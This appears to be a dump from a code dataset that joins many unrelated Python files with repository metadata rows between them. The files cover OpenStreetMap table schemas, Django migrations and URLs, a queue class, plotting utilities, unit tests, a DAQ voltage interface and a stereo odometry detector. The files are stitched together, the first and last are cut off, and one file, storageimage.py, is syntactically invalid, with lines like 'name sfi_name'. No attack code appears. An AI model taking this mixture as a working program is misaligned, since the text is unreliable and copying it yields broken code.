Column('z_order', SmallInteger),
Column('way_area', Float),
Column('osm_timestamp', DateTime),
Column('osm_version', Text),
Column('tags', HSTORE),
Column('way', Geometry(geometry_type='Geometry', srid=900913), index=True)
)
class OsmRel(Base):
__tablename__ = 'osm_rels'
id = Column(BigInteger, primary_key=True)
way_off = Column(SmallInteger)
rel_off = Column(SmallInteger)
parts = Column(ARRAY(BIGINT()), index=True)
members = Column(ARRAY(TEXT()))
tags = Column(ARRAY(TEXT()))
t_osm_roads = Table(
'osm_roads', metadata,
Column('osm_id', BigInteger, index=True),
Column('access', Text),
Column('addr:city', Text),
Column('addr:housenumber', Text),
Column('addr:interpolation', Text),
Column('addr:place', Text),
Column('addr:postcode', Text),
Column('addr:street', Text),
Column('addr:country', Text),
Column('admin_level', Text),
Column('aerialway', Text),
Column('aeroway', Text),
Column('amenity', Text),
Column('area', Text),
Column('barrier', Text),
Column('brand', Text),
Column('bridge', Text),
Column('boundary', Text),
Column('building', Text),
Column('bus', Text),
Column('contact:phone', Text),
Column('cuisine', Text),
Column('denomination', Text),
Column('drinkable', Text),
Column('emergency', Text),
Column('entrance', Text),
Column('foot', Text),
Column('frequency', Text),
Column('generator:source', Text),
Column('height', Text),
Column('highway', Text),
Column('historic', Text),
Column('information', Text),
Column('junction', Text),
Column('landuse', Text),
Column('layer', Text),
Column('leisure', Text),
Column('man_made', Text),
Column('maxspeed', Text),
Column('military', Text),
Column('name', Text),
Column('int_name', Text),
Column('name:en', Text),
Column('name:de', Text),
Column('name:fr', Text),
Column('name:es', Text),
Column('natural', Text),
Column('office', Text),
Column('oneway', Text),
Column('opening_hours', Text),
Column('operator', Text),
Column('phone', Text),
Column('power', Text),
Column('power_source', Text),
Column('parking', Text),
Column('place', Text),
Column('population', Text),
Column('public_transport', Text),
Column('recycling:glass', Text),
Column('recycling:paper', Text),
Column('recycling:clothes', Text),
Column('recycling:scrap_metal', Text),
Column('railway', Text),
Column('ref', Text),
Column('religion', Text),
Column('route', Text),
Column('service', Text),
Column('shop', Text),
Column('sport', Text),
Column('tourism', Text),
Column('tower:type', Text),
Column('tracktype', Text),
Column('traffic_calming', Text),
Column('train', Text),
Column('tram', Text),
Column('tunnel', Text),
Column('type', Text),
Column('vending', Text),
Column('voltage', Text),
Column('water', Text),
Column('waterway', Text),
Column('website', Text),
Column('wetland', Text),
Column('width', Text),
Column('wikipedia', Text),
Column('z_order', SmallInteger),
Column('way_area', Float),
Column('osm_timestamp', DateTime),
Column('osm_version', Text),
Column('tags', HSTORE),
Column('way', Geometry(geometry_type='LineString', srid=900913), index=True)
)
class OsmWay(Base):
__tablename__ = 'osm_ways'
id = Column(BigInteger, primary_key=True)
nodes = Column(ARRAY(BIGINT()), nullable=False, index=True)
tags = Column(ARRAY(TEXT()))
| 29.961995 | 108 | 0.615507 | 694 | 0.055018 | 0 | 0 | 0 | 0 | 0 | 0 | 3,860 | 0.306009 |
7b64b4f449f372c3bd3efce8e5b293075f2e5515 | 321 | py | Python | twinfield/tests/__init__.py | yellowstacks/twinfield | 2ae161a6cf6d7ff1f2c80a034b775f3d4928313d | [
"Apache-2.0"
]
| 4 | 2020-12-20T23:02:33.000Z | 2022-01-13T19:40:13.000Z | twinfield/tests/__init__.py | yellowstacks/twinfield | 2ae161a6cf6d7ff1f2c80a034b775f3d4928313d | [
"Apache-2.0"
]
| 9 | 2020-12-18T07:27:07.000Z | 2022-02-17T09:23:51.000Z | twinfield/tests/__init__.py | yellowstacks/twinfield | 2ae161a6cf6d7ff1f2c80a034b775f3d4928313d | [
"Apache-2.0"
]
| null | null | null | import logging
from keyvault import secrets_to_environment
from twinfield import TwinfieldApi
logging.basicConfig(
format="%(asctime)s.%(msecs)03d [%(levelname)-5s] [%(name)s] - %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.INFO,
)
secrets_to_environment("twinfield-test")
tw = TwinfieldApi()
| 20.0625 | 80 | 0.70405 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 103 | 0.320872 |
7b64b79a9fe2fe03f8066b0d29de8f2b6617fac5 | 397 | py | Python | magic/magicdb/migrations/0002_auto_20181027_1726.py | ParserKnight/django-app-magic | bdedf7f423da558f09d5818157762f3d8ac65d93 | [
"MIT"
]
| 1 | 2019-12-20T17:56:13.000Z | 2019-12-20T17:56:13.000Z | magic/magicdb/migrations/0002_auto_20181027_1726.py | ParserKnight/django-app-magic | bdedf7f423da558f09d5818157762f3d8ac65d93 | [
"MIT"
]
| 11 | 2019-11-23T19:24:17.000Z | 2022-03-11T23:34:21.000Z | magic/magicdb/migrations/0002_auto_20181027_1726.py | ParserKnight/django-app-magic | bdedf7f423da558f09d5818157762f3d8ac65d93 | [
"MIT"
]
| 1 | 2019-12-20T17:58:20.000Z | 2019-12-20T17:58:20.000Z | # Generated by Django 2.1.2 on 2018-10-27 17:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('magicdb', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='card',
name='number',
field=models.IntegerField(blank=True, null=True, unique=True),
),
]
| 20.894737 | 74 | 0.594458 | 304 | 0.765743 | 0 | 0 | 0 | 0 | 0 | 0 | 84 | 0.211587 |
7b6531b31b1e432174690734541236e12b96ec5b | 385 | py | Python | dscli/storageimage.py | Taywee/dscli-python | c06786d3924912b323251d8e081edf60d3cedef0 | [
"MIT"
]
| null | null | null | dscli/storageimage.py | Taywee/dscli-python | c06786d3924912b323251d8e081edf60d3cedef0 | [
"MIT"
]
| null | null | null | dscli/storageimage.py | Taywee/dscli-python | c06786d3924912b323251d8e081edf60d3cedef0 | [
"MIT"
]
| null | null | null | # -*- coding: utf-8 -*-
# Copyright © 2017 Taylor C. Richberger <[email protected]>
# This code is released under the license described in the LICENSE file
from __future__ import division, absolute_import, print_function, unicode_literals
class StorageImage(Instance):
def __init__(self, xml):
name sfi_name
id ess_id
storagesystem sf_id
model model
| 29.615385 | 82 | 0.711688 | 146 | 0.378238 | 0 | 0 | 0 | 0 | 0 | 0 | 151 | 0.391192 |
7b654b9c9b8b039ce736b77aa128a506d29b9452 | 140 | py | Python | Pruebas/prob_14.py | FR98/Cuarto-Compu | 3824d0089562bccfbc839d9979809bc7a0fe4684 | [
"MIT"
]
| 1 | 2022-03-20T12:57:04.000Z | 2022-03-20T12:57:04.000Z | Pruebas/prob_14.py | FR98/cuarto-compu | 3824d0089562bccfbc839d9979809bc7a0fe4684 | [
"MIT"
]
| null | null | null | Pruebas/prob_14.py | FR98/cuarto-compu | 3824d0089562bccfbc839d9979809bc7a0fe4684 | [
"MIT"
]
| null | null | null | def prob_14(n):
if n < 2:
return False
for i in range(2, n):
if n % i == 0:
return False
return True | 20 | 25 | 0.464286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
7b65bb70b1e3c95b7c5e5cfddb6056ef4399ec89 | 2,968 | py | Python | crnpy/utils.py | mehradans92/crnpy | e145d63b5cf97eb3c91276000cc8fef92c35cde9 | [
"BSD-3-Clause"
]
| null | null | null | crnpy/utils.py | mehradans92/crnpy | e145d63b5cf97eb3c91276000cc8fef92c35cde9 | [
"BSD-3-Clause"
]
| null | null | null | crnpy/utils.py | mehradans92/crnpy | e145d63b5cf97eb3c91276000cc8fef92c35cde9 | [
"BSD-3-Clause"
]
| null | null | null | import numpy as np
import matplotlib.pyplot as plt
def weighted_quantile(values, quantiles, sample_weight=None,
values_sorted=False, old_style=False):
''' Very close to numpy.percentile, but supports weights.
Note: quantiles should be in [0, 1]!
:param values: numpy.array with data
:param quantiles: array-like with many quantiles needed
:param sample_weight: array-like of the same length as `array`
:param values_sorted: bool, if True, then will avoid sorting of
initial array
:param old_style: if True, will correct output to be consistent
with numpy.percentile.
:return: numpy.array with computed quantiles.
'''
values = np.array(values)
quantiles = np.array(quantiles)
if sample_weight is None:
sample_weight = np.ones(len(values))
sample_weight = np.array(sample_weight)
assert np.all(quantiles >= 0) and np.all(quantiles <= 1), \
'quantiles should be in [0, 1]'
if not values_sorted:
sorter = np.argsort(values)
values = values[sorter]
sample_weight = sample_weight[sorter]
weighted_quantiles = np.cumsum(sample_weight) - 0.5 * sample_weight
if old_style:
# To be convenient with numpy.percentile
weighted_quantiles -= weighted_quantiles[0]
weighted_quantiles /= weighted_quantiles[-1]
else:
weighted_quantiles /= np.sum(sample_weight)
return np.interp(quantiles, weighted_quantiles, values)
def plot_samples(trajs, t, ref_traj=None, lower_q_bound=1/3, upper_q_bound=2/3, alpha=0.2, restraints=None, weights=None, crn=None, sim_incr=0.001):
if weights is None:
w = np.ones(trajs.shape[0])
else:
w = weights
w /= np.sum(w)
x = range(trajs.shape[1])
qtrajs = np.apply_along_axis(lambda x: weighted_quantile(
x, [lower_q_bound, 1/2, upper_q_bound], sample_weight=w), 0, trajs)
mtrajs = np.sum(trajs * w[:, np.newaxis, np.newaxis], axis=0)
qtrajs[0, :, :] = qtrajs[0, :, :] - qtrajs[1, :, :] + mtrajs
qtrajs[2, :, :] = qtrajs[2, :, :] - qtrajs[1, :, :] + mtrajs
qtrajs[1, :, :] = mtrajs
fig, ax = plt.subplots(dpi=100)
for i in range(trajs.shape[-1]):
ax.plot(t, qtrajs[1, :, i], color=f'C{i}', label=crn.species[i])
ax.fill_between(t, qtrajs[0, :, i],
qtrajs[2, :, i], color=f'C{i}', alpha=alpha)
if ref_traj is not None:
ax.plot(t, ref_traj[:, i], '--',
color=f'C{i}', label=crn.species[i])
ax.set_xlabel('Time (s)')
ax.set_ylabel('Species concentration')
handles, labels = ax.get_legend_handles_labels()
unique = [(h, l) for i, (h, l) in enumerate(
zip(handles, labels)) if l not in labels[:i]]
ax.legend(*zip(*unique), loc='upper left', bbox_to_anchor=(1.1, 0.9))
if restraints is not None:
for r in restraints:
ax.plot(r[2]*sim_incr, r[0], marker='o', color='k')
| 41.802817 | 148 | 0.626685 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 664 | 0.22372 |
7b65f6a1d2bed41aa57a027424c81ab5587c97d9 | 123 | py | Python | exercise/newfile5.py | LeeBeral/python | 9f0d360d69ee5245e3ef13a9dc9fc666374587a4 | [
"MIT"
]
| null | null | null | exercise/newfile5.py | LeeBeral/python | 9f0d360d69ee5245e3ef13a9dc9fc666374587a4 | [
"MIT"
]
| null | null | null | exercise/newfile5.py | LeeBeral/python | 9f0d360d69ee5245e3ef13a9dc9fc666374587a4 | [
"MIT"
]
| null | null | null | alist = [1,2,3,5,5,1,3]
b = set(alist)
c = tuple(alist)
print(b)
print(c)
print([x for x in b])
print([x for x in c]) | 17.571429 | 24 | 0.569106 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
7b661c16cd5afafef4aba119027c917f67774a50 | 170 | py | Python | ocp_resources/kubevirt_metrics_aggregation.py | kbidarkar/openshift-python-wrapper | 3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb | [
"Apache-2.0"
]
| 9 | 2021-07-05T18:35:55.000Z | 2021-12-31T03:09:39.000Z | ocp_resources/kubevirt_metrics_aggregation.py | kbidarkar/openshift-python-wrapper | 3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb | [
"Apache-2.0"
]
| 418 | 2021-07-04T13:12:09.000Z | 2022-03-30T08:37:45.000Z | ocp_resources/kubevirt_metrics_aggregation.py | kbidarkar/openshift-python-wrapper | 3cd4d6d3b71c82ff87f032a51510d9c9d207f6cb | [
"Apache-2.0"
]
| 28 | 2021-07-04T12:48:18.000Z | 2022-02-22T15:19:30.000Z | from ocp_resources.resource import NamespacedResource
class KubevirtMetricsAggregation(NamespacedResource):
api_group = NamespacedResource.ApiGroup.SSP_KUBEVIRT_IO
| 28.333333 | 59 | 0.870588 | 113 | 0.664706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
7b66b53434936973c793021141732d4d9ee0ccb9 | 1,329 | py | Python | metashare/accounts/urls.py | hpusset/ELRI | c4455cff3adb920627f014f37e740665342e9cee | [
"BSD-3-Clause"
]
| 1 | 2017-07-10T08:15:07.000Z | 2017-07-10T08:15:07.000Z | metashare/accounts/urls.py | hpusset/ELRI | c4455cff3adb920627f014f37e740665342e9cee | [
"BSD-3-Clause"
]
| null | null | null | metashare/accounts/urls.py | hpusset/ELRI | c4455cff3adb920627f014f37e740665342e9cee | [
"BSD-3-Clause"
]
| 1 | 2018-07-03T07:55:56.000Z | 2018-07-03T07:55:56.000Z | from django.conf.urls import patterns, url
from metashare.settings import DJANGO_BASE
urlpatterns = patterns('metashare.accounts.views',
url(r'create/$',
'create', name='create'),
url(r'confirm/(?P<uuid>[0-9a-f]{32})/$',
'confirm', name='confirm'),
url(r'contact/$',
'contact', name='contact'),
url(r'reset/(?:(?P<uuid>[0-9a-f]{32})/)?$',
'reset', name='reset'),
url(r'profile/$',
'edit_profile', name='edit_profile'),
url(r'editor_group_application/$',
'editor_group_application', name='editor_group_application'),
url(r'organization_application/$',
'organization_application', name='organization_application'),
url(r'update_default_editor_groups/$',
'update_default_editor_groups', name='update_default_editor_groups'),
url(r'edelivery_membership_application/$',
'edelivery_application', name='edelivery_application'),
)
urlpatterns += patterns('django.contrib.auth.views',
url(r'^profile/change_password/$', 'password_change',
{'post_change_redirect' : '/{0}accounts/profile/change_password/done/'.format(DJANGO_BASE), 'template_name': 'accounts/change_password.html'}, name='password_change'),
url(r'^profile/change_password/done/$', 'password_change_done',
{'template_name': 'accounts/change_password_done.html'}, name='password_change_done'),
)
| 42.870968 | 175 | 0.713318 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 897 | 0.674944 |
7b690221ede88220da58423f3771708cee9c615d | 4,090 | py | Python | lib_collection/queue/resizing_array_queue.py | caser789/libcollection | eb0a6fc36ce1cb57ed587865bbc1576e81c08924 | [
"MIT"
]
| null | null | null | lib_collection/queue/resizing_array_queue.py | caser789/libcollection | eb0a6fc36ce1cb57ed587865bbc1576e81c08924 | [
"MIT"
]
| null | null | null | lib_collection/queue/resizing_array_queue.py | caser789/libcollection | eb0a6fc36ce1cb57ed587865bbc1576e81c08924 | [
"MIT"
]
| null | null | null | class ResizingArrayQueue(object):
def __init__(self, lst=None, capacity=2):
self.capacity = capacity
self.lst = [None] * self.capacity
self.head = 0
self.tail = 0
self.n = 0
def __len__(self):
"""
>>> queue = ResizingArrayQueue()
>>> len(queue)
0
>>> queue.enqueue('a')
>>> len(queue)
1
>>> queue.enqueue('b')
>>> len(queue)
2
"""
return self.n
def __contains__(self, i):
"""
>>> queue = ResizingArrayQueue()
>>> 'a' in queue
False
>>> queue.enqueue('a')
>>> queue.enqueue('b')
>>> 'a' in queue
True
"""
for j in self:
if j == i:
return True
return False
def __iter__(self):
"""
>>> queue = ResizingArrayQueue()
>>> queue.enqueue('a')
>>> queue.enqueue('b')
>>> for i in queue:
... print i
...
a
b
"""
n = self.head
for _ in range(len(self)):
if n == self.capacity:
n = 0
yield self.lst[n]
n += 1
def __repr__(self):
"""
>>> queue = ResizingArrayQueue()
>>> queue.enqueue('a')
>>> queue.enqueue('b')
>>> queue
ResizingArrayQueue(['a', 'b'])
>>> print queue
ResizingArrayQueue(['a', 'b'])
"""
return 'ResizingArrayQueue([{}])'.format(', '.join(repr(i) for i in self))
def enqueue(self, i):
"""
>>> queue = ResizingArrayQueue()
>>> queue.enqueue('a')
>>> queue.enqueue('b')
>>> queue.enqueue('c')
>>> queue
ResizingArrayQueue(['a', 'b', 'c'])
>>> queue.capacity
4
"""
if len(self) == self.capacity:
self._resize(self.capacity*2)
if self.tail == self.capacity:
self.tail = 0
self.lst[self.tail] = i
self.tail += 1
self.n += 1
def dequeue(self):
"""
>>> queue = ResizingArrayQueue()
>>> queue.dequeue()
Traceback (most recent call last):
...
IndexError: dequeue from empty queue
>>> queue.enqueue('a')
>>> queue.enqueue('b')
>>> queue.enqueue('c')
>>> queue.dequeue()
'a'
>>> queue.dequeue()
'b'
>>> queue.enqueue('d')
>>> queue.enqueue('e')
>>> queue.enqueue('f')
>>> queue.lst
['e', 'f', 'c', 'd']
>>> queue.enqueue('g')
>>> queue.capacity
8
>>> queue.dequeue()
'c'
>>> queue.dequeue()
'd'
>>> queue.dequeue()
'e'
>>> queue.dequeue()
'f'
>>> queue.capacity
4
>>> queue.dequeue()
'g'
>>> queue.capacity
2
"""
if len(self) == 0:
raise IndexError('dequeue from empty queue')
if len(self) * 4 <= self.capacity:
self._resize(self.capacity/2)
if self.head == self.capacity:
self.head = 0
res = self.lst[self.head]
self.head += 1
self.n -= 1
return res
@property
def top(self):
"""
>>> queue = ResizingArrayQueue()
>>> queue.top
Traceback (most recent call last):
...
IndexError: top from empty queue
>>> queue.enqueue('a')
>>> queue.top
'a'
>>> queue.enqueue('b')
>>> queue.top
'a'
>>> queue.dequeue()
'a'
>>> queue.top
'b'
"""
if len(self) == 0:
raise IndexError('top from empty queue')
return self.lst[self.head]
def _resize(self, n):
q = ResizingArrayQueue(capacity=n)
for e in self:
q.enqueue(e)
self.capacity = q.capacity
self.lst = q.lst
self.head = q.head
self.tail = q.tail
self.n = q.n
| 23.505747 | 82 | 0.429829 | 4,089 | 0.999756 | 393 | 0.096088 | 534 | 0.130562 | 0 | 0 | 2,407 | 0.588509 |
7b6919cc089619a865a91ca1a0c07ade430d6d28 | 366 | py | Python | conduit/config/env/__init__.py | utilmeta/utilmeta-py-realworld-example-app | cf6d9e83e72323a830b2fcdb5c5eae3ebd800103 | [
"MIT"
]
| null | null | null | conduit/config/env/__init__.py | utilmeta/utilmeta-py-realworld-example-app | cf6d9e83e72323a830b2fcdb5c5eae3ebd800103 | [
"MIT"
]
| null | null | null | conduit/config/env/__init__.py | utilmeta/utilmeta-py-realworld-example-app | cf6d9e83e72323a830b2fcdb5c5eae3ebd800103 | [
"MIT"
]
| null | null | null | from utilmeta.conf import Env
class ServiceEnvironment(Env):
PRODUCTION: bool = False
OPS_TOKEN: str = ''
JWT_SECRET_key: str = ''
DATABASE_USER: str = ''
DATABASE_PASSWORD: str = ''
REDIS_PASSWORD: str = ''
PUBLIC_ONLY: bool = True
TEST_ENV_SUFFIX: str = '' # be -test when it's test env
env = ServiceEnvironment(__file__)
| 22.875 | 65 | 0.650273 | 296 | 0.808743 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.112022 |
7b6a1e3587e95d7c0cf5eb9e41ba34ccfca2c19e | 437 | py | Python | sort/counting.py | haandol/dojo | c29dc54614bdfaf79eb4862ed9fa25974a0f5654 | [
"MIT"
]
| null | null | null | sort/counting.py | haandol/dojo | c29dc54614bdfaf79eb4862ed9fa25974a0f5654 | [
"MIT"
]
| null | null | null | sort/counting.py | haandol/dojo | c29dc54614bdfaf79eb4862ed9fa25974a0f5654 | [
"MIT"
]
| null | null | null | # https://www.geeksforgeeks.org/counting-sort/
def sort(arr):
n = len(arr)
result = [-1] * n
counts = [0] * (max(arr) + 1)
for el in arr:
counts[el] += 1
for i in range(1, len(counts)):
counts[i] += counts[i-1]
for i in range(n):
result[counts[arr[i]] - 1] = arr[i]
counts[arr[i]] -= 1
return result
if __name__ == '__main__':
arr = [10, 7, 8, 9, 1, 5]
assert [1, 5, 7, 8, 9, 10] == sort(arr)
| 18.208333 | 46 | 0.535469 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 56 | 0.128146 |
7b6a67db77e30e9f797bb8f8a046460eef6c1f54 | 1,316 | py | Python | uedinst/daq.py | trbritt/uedinst | e9fe1379b762be97b31ffab86a2cb149cb6291da | [
"BSD-3-Clause"
]
| null | null | null | uedinst/daq.py | trbritt/uedinst | e9fe1379b762be97b31ffab86a2cb149cb6291da | [
"BSD-3-Clause"
]
| null | null | null | uedinst/daq.py | trbritt/uedinst | e9fe1379b762be97b31ffab86a2cb149cb6291da | [
"BSD-3-Clause"
]
| null | null | null | import nidaqmx
from . import InstrumentException
from time import sleep
class PCI6281:
"""
Interface to NI-Data Aquisition PCI-6281.
"""
def __init__(self, *args, **kwargs):
pass
def set_voltage(self, value, timeout=None):
"""
Set voltage on the output channel.
Parameters
----------
value : float
Voltage value [V]
timeout : float or None, optional
Voltage time-out [s]. If None (default), voltage is assigned indefinitely.
Raises
------
InstrumentException : if voltage `value` is outside of += 10V.
"""
value = float(value)
if abs(value) > 10:
raise InstrumentException(
f"Voltage {value} is outside of permissible bounds of +=10V"
)
if timeout is not None:
if timeout <= 0:
raise InstrumentException(
f"A time-out value of {timeout} seconds is not valid."
)
with nidaqmx.Task() as task:
task.ao_channels.add_ao_voltage_chan("Dev1/ao1")
task.write(value)
task.stop()
if timeout is not None:
sleep(timeout)
task.write(0)
task.stop()
| 26.32 | 86 | 0.522796 | 1,241 | 0.943009 | 0 | 0 | 0 | 0 | 0 | 0 | 570 | 0.433131 |
7b6ab2fe5bfb6e6c729ecffe273017b734826941 | 1,135 | py | Python | tests/operations_model_test.py | chlemagne/python-oop-calculator | 0259ce0f7a72faab60b058588a6838fe107e88eb | [
"MIT"
]
| null | null | null | tests/operations_model_test.py | chlemagne/python-oop-calculator | 0259ce0f7a72faab60b058588a6838fe107e88eb | [
"MIT"
]
| null | null | null | tests/operations_model_test.py | chlemagne/python-oop-calculator | 0259ce0f7a72faab60b058588a6838fe107e88eb | [
"MIT"
]
| null | null | null | """ Unittest.
"""
import unittest
from calculator.standard.operations_model import (
UniOperation,
BiOperation,
Square,
SquareRoot,
Reciprocal,
Add,
Subtract,
Multiply,
Divide,
Modulo
)
class OperationsModelTest(unittest.TestCase):
""" Operations model test suite.
"""
def test_operation_category(self):
# steps
square = Square
multiply = Multiply
# test
self.assertTrue(issubclass(square, UniOperation))
self.assertTrue(issubclass(multiply, BiOperation))
def test_uni_operand_operations(self):
# steps
square = Square
square_root = SquareRoot
# test
self.assertEqual(square.eval(5), 25)
self.assertEqual(square_root.eval(25), 5)
def test_bi_operand_operations(self):
# steps
add = Add
sub = Subtract
mul = Multiply
div = Divide
# test
self.assertEqual(add.eval(1, 2), 3)
self.assertEqual(sub.eval(5, -2), 7)
self.assertEqual(mul.eval(1.5, -5), -7.5)
self.assertEqual(div.eval(6, 0.5), 12)
| 21.415094 | 58 | 0.600881 | 905 | 0.797357 | 0 | 0 | 0 | 0 | 0 | 0 | 96 | 0.084581 |
7b6c01aa137fe5eab922023b4f7b039eaadf78f0 | 684 | py | Python | LAB5/lab/main.py | ThinkingFrog/MathStat | cd3712f4f4a59badd7f2611de64681b0e928d3db | [
"MIT"
]
| null | null | null | LAB5/lab/main.py | ThinkingFrog/MathStat | cd3712f4f4a59badd7f2611de64681b0e928d3db | [
"MIT"
]
| null | null | null | LAB5/lab/main.py | ThinkingFrog/MathStat | cd3712f4f4a59badd7f2611de64681b0e928d3db | [
"MIT"
]
| null | null | null | from lab.distribution import DistrManager
def main():
sizes = [20, 60, 100]
rhos = [0, 0.5, 0.9]
times = 1000
manager = DistrManager(sizes, rhos, times)
for size in sizes:
for rho in rhos:
mean, sq_mean, disp = manager.get_coeff_stats("Normal", size, rho)
print(
f"Normal\t Size = {size}\t Rho = {rho}\t Mean = {mean}\t Squares mean = {sq_mean}\t Dispersion = {disp}"
)
mean, sq_mean, disp = manager.get_coeff_stats("Mixed", size, rho)
print(
f"Mixed\t Size = {size}\t Mean = {mean}\t Squares mean = {sq_mean}\t Dispersion = {disp}"
)
manager.draw(size)
| 28.5 | 120 | 0.557018 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 208 | 0.304094 |
7b6c677fc5296afba3c3ed059b4dbdc0e009c7cf | 3,010 | py | Python | haplotype_plot/tests/test_plot.py | neobernad/haplotype_plot | 45d9e916f474242648baa8d8b2afe9d502302485 | [
"MIT"
]
| 2 | 2021-01-09T10:43:25.000Z | 2021-02-16T17:21:08.000Z | haplotype_plot/tests/test_plot.py | neobernad/haplotype_plot | 45d9e916f474242648baa8d8b2afe9d502302485 | [
"MIT"
]
| 3 | 2021-02-01T11:28:17.000Z | 2021-03-29T22:12:48.000Z | haplotype_plot/tests/test_plot.py | neobernad/haplotype_plot | 45d9e916f474242648baa8d8b2afe9d502302485 | [
"MIT"
]
| null | null | null | import unittest
import logging
import os
import haplotype_plot.genotyper as genotyper
import haplotype_plot.reader as reader
import haplotype_plot.haplotyper as haplotyper
import haplotype_plot.plot as hplot
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
dir_path = os.path.dirname(os.path.realpath(__file__))
class TestPlotting(unittest.TestCase):
vcf_path = os.path.join(dir_path, "data/chr01.vcf")
chrom = "chr01"
parental_sample = "SAMPLE4"
sample_list = None
phase = False
def setUp(self) -> None:
self.sample_list = reader.get_samples(self.vcf_path)
def test_plot_config(self):
plot_config = hplot.PlotConfig()
logger.debug(plot_config)
def test_generate_heterozygous_yticks(self):
heterozygous = haplotyper.Zygosity.HET
haplotype_wrapper = genotyper.process(self.vcf_path, self.chrom,
self.parental_sample, self.phase, heterozygous)
plotter = hplot.Plotter(haplotype_wrapper)
labels = plotter.get_ytickslabels()
logger.debug("Parent: {parent}".format(parent=self.parental_sample))
logger.debug(labels)
def test_generate_homozygous_yticks(self):
homozygous = haplotyper.Zygosity.HOM
haplotype_wrapper = genotyper.process(self.vcf_path, self.chrom,
self.parental_sample, self.phase, homozygous)
plotter = hplot.Plotter(haplotype_wrapper)
labels = plotter.get_ytickslabels()
logger.debug("Parent: {parent}".format(parent=self.parental_sample))
logger.debug(labels)
def test_plot_homozygous_haplotypes(self):
homozygous = haplotyper.Zygosity.HOM
haplotype_wrapper = genotyper.process(self.vcf_path, self.chrom,
self.parental_sample, self.phase, homozygous)
plotter = hplot.Plotter(haplotype_wrapper)
ytickslabels = plotter.get_ytickslabels()
custom_config = hplot.PlotConfig(
title="Parental '{parent}' in '{chrom}'".format(parent=self.parental_sample, chrom=self.chrom),
xtickslabels=plotter.get_xtickslabels(),
ytickslabels=ytickslabels,
start=0,
end=1000,
size_x=10,
size_y=len(ytickslabels) * .2,
show=True
)
plotter.plot_haplotypes(custom_config)
def test_plot_heterozygous_haplotypes(self):
heterozygous = haplotyper.Zygosity.HET
haplotype_wrapper = genotyper.process(self.vcf_path, self.chrom,
self.parental_sample, self.phase, heterozygous)
plotter = hplot.Plotter(haplotype_wrapper)
user_conf = list(["show=False", "xtickslabels=False", "size_y=5"])
plotter.plot_haplotypes(override_conf=user_conf)
if __name__ == '__main__':
unittest.main()
| 38.589744 | 108 | 0.644186 | 2,606 | 0.865781 | 0 | 0 | 0 | 0 | 0 | 0 | 154 | 0.051163 |
7b6e114171988bb11bb357d60e9671587a0a54e0 | 1,806 | py | Python | src/docknet/data_generator/chessboard_data_generator.py | Accenture/Docknet | e81eb0c5aefd080ebeebf369d41f8d3fa85ab917 | [
"Apache-2.0"
]
| 2 | 2020-06-29T08:58:26.000Z | 2022-03-08T11:38:18.000Z | src/docknet/data_generator/chessboard_data_generator.py | jeekim/Docknet | eb3cad13701471a7aaeea1d573bc5608855bab52 | [
"Apache-2.0"
]
| 1 | 2022-03-07T17:58:59.000Z | 2022-03-07T17:58:59.000Z | src/docknet/data_generator/chessboard_data_generator.py | jeekim/Docknet | eb3cad13701471a7aaeea1d573bc5608855bab52 | [
"Apache-2.0"
]
| 3 | 2020-06-29T08:58:31.000Z | 2020-11-22T11:23:11.000Z | from typing import Tuple
import numpy as np
from docknet.data_generator.data_generator import DataGenerator
class ChessboardDataGenerator(DataGenerator):
"""
The chessboard data generator generates two classes (0 and 1) of 2D vectors distributed as follows:
0011
0011
1100
1100
"""
def func0(self, x: np.array):
"""
Generator function of 2D vectors of class 0 (top-left and bottom-right squares)
:param x: a 2D random generated vector
:return: the corresponding individual of class 0
"""
f0 = x[0] * self.x_half_scale + self.x_min
f1 = x[1] * self.y_scale + self.y_min
if x[1] < 0.5:
f0 += self.x_half_scale
return np.array([f0, f1])
def func1(self, x: np.array):
"""
Generator function of 2D vectors of class 1 (top-right and bottom-left squares)
:param x: a 2D random generated vector
:return: the corresponding individual of class 1
"""
f0 = x[0] * self.x_scale + self.x_min
f1 = x[1] * self.y_half_scale + self.y_min
if x[0] >= 0.5:
f1 += self.y_half_scale
return np.array([f0, f1])
def __init__(self, x0_range: Tuple[float, float], x1_range: Tuple[float, float]):
"""
Initializes the chessboard data generator
:param x0_range: tuple of minimum and maximum x values
:param x1_range: tuple of minimum and maximum y values
"""
super().__init__((self.func0, self.func1))
self.x_scale = x0_range[1] - x0_range[0]
self.x_min = x0_range[0]
self.x_half_scale = self.x_scale / 2
self.y_scale = x1_range[1] - x1_range[0]
self.y_min = x1_range[0]
self.y_half_scale = self.y_scale / 2
| 32.836364 | 103 | 0.606312 | 1,693 | 0.937431 | 0 | 0 | 0 | 0 | 0 | 0 | 773 | 0.428018 |
7b7181c5da71f675df29626211d629f1f9f4e5ef | 5,485 | py | Python | stereoVO/geometry/features.py | sakshamjindal/Visual-Odometry-Pipeline-in-Python | d4a8a8ee16f91a145b90c41744a85e8dd1c1d249 | [
"Apache-2.0"
]
| 10 | 2021-11-01T23:56:30.000Z | 2022-03-07T08:08:25.000Z | stereoVO/geometry/features.py | sakshamjindal/StereoVO-SFM | d4a8a8ee16f91a145b90c41744a85e8dd1c1d249 | [
"Apache-2.0"
]
| null | null | null | stereoVO/geometry/features.py | sakshamjindal/StereoVO-SFM | d4a8a8ee16f91a145b90c41744a85e8dd1c1d249 | [
"Apache-2.0"
]
| 1 | 2021-12-02T03:15:00.000Z | 2021-12-02T03:15:00.000Z | import cv2
import numpy as np
import matplotlib.pyplot as plt
__all__ = ['DetectionEngine']
class DetectionEngine():
"""
Main Engine Code for detection of feature in the frames and
matching of features in the frames at the current stereo state
"""
def __init__(self, left_frame, right_frame, params):
"""
:param left_frame (np.array): of size (HxWx3 or HxW) of stereo configuration
